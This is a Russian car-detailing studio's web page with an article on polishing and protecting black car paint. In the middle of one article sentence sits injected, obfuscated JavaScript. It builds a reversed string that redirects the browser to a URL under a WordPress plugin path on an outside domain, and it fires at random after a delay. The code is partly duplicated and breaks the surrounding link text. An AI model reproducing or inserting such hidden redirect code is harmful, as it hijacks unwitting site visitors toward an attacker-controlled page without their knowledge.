Адрес: Витебский проспект, 1а г.Санкт-Петербург

8 921 444 41 78

Забронировать время и дату

Меню

Косметическое обслуживание, тюнинг и реставрация салона в Санкт-Петербурге

8 921 444 41 78

Забронировать время и дату

Полировка авто черного цвета

При выборе автомобиля многие покупатели чаще всего останавливаются на белом или черном цвете, в обслуживании и эксплуатации которых существует разница. Черный – не только придает определенную брутальность, но и считается показателем статуса автовладельца. Действительно, сверкающий краской и ярким лаком автомобиль добавляет уверенности и агрессивности. Однако, такой тон таит в себе трудности, с которыми рано или поздно столкнется владелец. Уже после нескольких месяцев езды можно заметить, что автокузов покрывается микроцарапинами, потертостями, блеск свежей автокраски начинает пропадать. Помочь решить такую проблему может полировка авто и последующее $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomobilya/» rel=»noopener» target=»_blank»>нанесение защитного покрытия для сохранения полученного результата, глубины оттенка и сияния. Особенности одного из самых распространенных цветов, и специфику ухода за ним, рассмотрим в статье.

Именно на темном лаке сразу видны любые недостатки, паутинки, затертость, поэтому так важно только купленную машину защитить одним из доступных сейчас типов протекции ЛКП – керамикой, жидким стеклом, полиуретановой пленкой. В противном случае для поддержания безупречного внешнего вида придется периодически выполнять шлифовку, что в итоге приведет к потребности перекрасить весь кузов.

Особенности ухода и полировки авто черного цвета

Главным отличием ухода за транспортом темных окрасок является то, что на них заметны абсолютно все повреждения, что повышает требования к качеству проводимых работ. Для полировки авто такой расцветки требуется больше сил и времени, только идеально выполненная обработка даст хороший эффект.

Техобслуживание новой автомашины проще ввиду меньшего числа дефектов, поэтому чем раньше будет защищено ЛКП, тем выше вероятность того, что оно дольше сохранится в прекрасном состоянии.

Где лучше проводить полировку авто

Осуществлять полировальные процедуры лучше в профессиональной детейлинг студии, где мастера имеют внушительный опыт подобных услуг и необходимые знания, а также специальное оборудование, материалы, химию. Самостоятельные работы могут стать причиной непредсказуемых последствий, даже ухудшить ситуацию. Не стоит забывать и том, что для полирования нужна тщательно вычищенная и подготовленная поверхность. Полировщик производит замеры толщины лакокрасочного покрытия, составляет карту автокузова и проводит несколько этапов полирования по необходимости – от абразивного, удаляющего глубокие неровности, до голограммного, снимающего самые мелкие едва видимые разводы. После проведения восстановления, по желанию клиента следует нанесение защиты.

Профессиональный детейлинг для вашего авто в Санкт-Петербурге

Официальныая гарантия на все виды услуг

Авто после детейлинга

Узнайте стоимость детейлинга для вашего автомобиля

Оставьте свой телефон и ответьте на пару вопросов менеджера

Это бесплатно и ни к чему не обязывает

Если у вас нет времени, то просто позвоните нам:

8 921 444 41 78